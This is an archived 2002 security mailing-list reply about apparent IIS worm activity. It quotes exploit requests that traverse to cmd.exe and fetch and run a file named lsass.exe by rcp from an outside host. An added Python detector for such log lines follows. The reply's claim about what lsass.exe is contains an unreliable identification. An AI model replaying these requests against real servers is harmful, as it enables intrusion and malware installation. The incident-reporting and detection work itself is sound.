Security Incidents mailing list archives

Re: new IIS worm? (rcp lsass.exe)


From: Michael Thompson <mike () thompsonmike co uk>
Date: Mon, 23 Sep 2002 01:25:30 +0100

Hello Christian,

On Sat, 21 Sep 2002, at 20:17:48 [GMT +0200] (which was 19:17 in my
TimeZone) you wrote:

CM> hi,

CM> for about a week I have noticed attempts to exploit vulnerable IIS installations
CM> (they show up with snort's "WEB-IIS multiple decode attempt" signature)
CM> that seem to try and load an "lsass.exe" file via rcp.

CM> As a search of google and securityfocus turned up nothing, I'll throw in 
CM> what I gathered so far and ask if anybody can identify this: (it seems
CM> the affected customer's systems weren't vulnerable, so I don't know what
CM> the worm's further actions are).

CM> The first part is a SYN scan for port 80, with the source port set to 80, 
CM> differing ACK numbers, but the same ISN. Interestingly, it iterates over
CM> the 3rd IP address octet first, and the 4th later, probably to make the scan
CM> on the single /24 slower and less noticeable (in the case I've seen, it
CM> has some 30 seconds between packets to consecutive addresses).

CM> Then it seems to go after the web servers, sending the following:

CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..

CM> and

CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0

CM> I've been able to get hold of that lsass.exe binary (9728 bytes), but 
CM> I lack the skills to analyze it; I'll happily mail it to anybody who asks.

CM> Yes, and the IP address doing the scanning + exploit attempts is different
CM> from the one which provides lsass.exe; the scanning machine seems to be
CM> a Solaris 2.7 default install, the rcp-server seems to be Solaris 2.8.

CM> regards,

CM> cm.


lsass.exe is the Microsoft Secure Storage for 2000/NT and XP. It is
responsible for managing secure storage in those environments.

-- 
Best regards,
 Michael

http://wwww.thompsonmike.co.uk/
PGP KeyID := 0x3CC985FA

I just can't put it down. 
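The two request lines Christian quotes are the HTTP side of the activity, and they are the part a web-server operator can check for in existing access logs. The following Python is an added example, not code from either poster or from Snort: it decodes a request URL the way an IIS "multiple decode" flaw would (percent-decoding twice, then treating %5c as a backslash) and flags requests that traverse out of /scripts into cmd.exe or carry an rcp fetch in the command. The sample request lines are constructed for the example; the rcp host 192.0.2.10 is a documentation-range placeholder, not the address from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines for exercising the detector. They are not
# taken from any real log; 192.0.2.10 is a placeholder for the rcp server.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+192.0.2.10.lp:lsass.exe+. HTTP/1.0",
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0",
    "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /images/logo%20final.png HTTP/1.0",
]

# ".." as a complete path component after normalisation
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def normalise_url(raw, rounds=2):
    """Percent-decode up to `rounds` times and fold backslashes to slashes.

    Two rounds mirror the IIS double-decode behaviour: %255c -> %5c -> '\\'.
    A single-encoded %5c decodes on the first round and stops early.
    """
    url = raw
    for _ in range(rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url.replace("\\", "/")


def classify(request_line):
    """Return a dict explaining why a request line is suspicious, or None."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    method, raw_url = parts[0], parts[1]
    raw_path, _, raw_query = raw_url.partition("?")
    path = normalise_url(raw_path)
    query = normalise_url(raw_query)
    reasons = []

    if TRAVERSAL.search(path):
        reasons.append("directory traversal")
    lowered = raw_path.lower()
    if "%5c" in lowered or "%25" in lowered:
        reasons.append("percent-encoded backslash (%5c / %255c)")
    if path.lower().endswith("cmd.exe"):
        reasons.append("cmd.exe invocation")
    # IIS passes '+' in the query as a space when building the command line
    if "rcp" in query.replace("+", " ").lower().split():
        reasons.append("rcp file fetch in command")

    if not reasons:
        return None
    return {"method": method, "path": path, "query": query, "reasons": reasons}


def scan(lines):
    """Return (line, finding) pairs for every suspicious request line."""
    hits = []
    for line in lines:
        finding = classify(line)
        if finding is not None:
            hits.append((line, finding))
    return hits


if __name__ == "__main__":
    for line, finding in scan(SAMPLE_REQUESTS):
        print(line)
        print("   ->", finding["path"], "|", ", ".join(finding["reasons"]))
```

Run against real IIS logs, feed only the request field into `classify`; the decode loop is the important part, since a naive `..%5c` string match misses the double-encoded `%255c` form that the same Snort signature family also covers.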



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

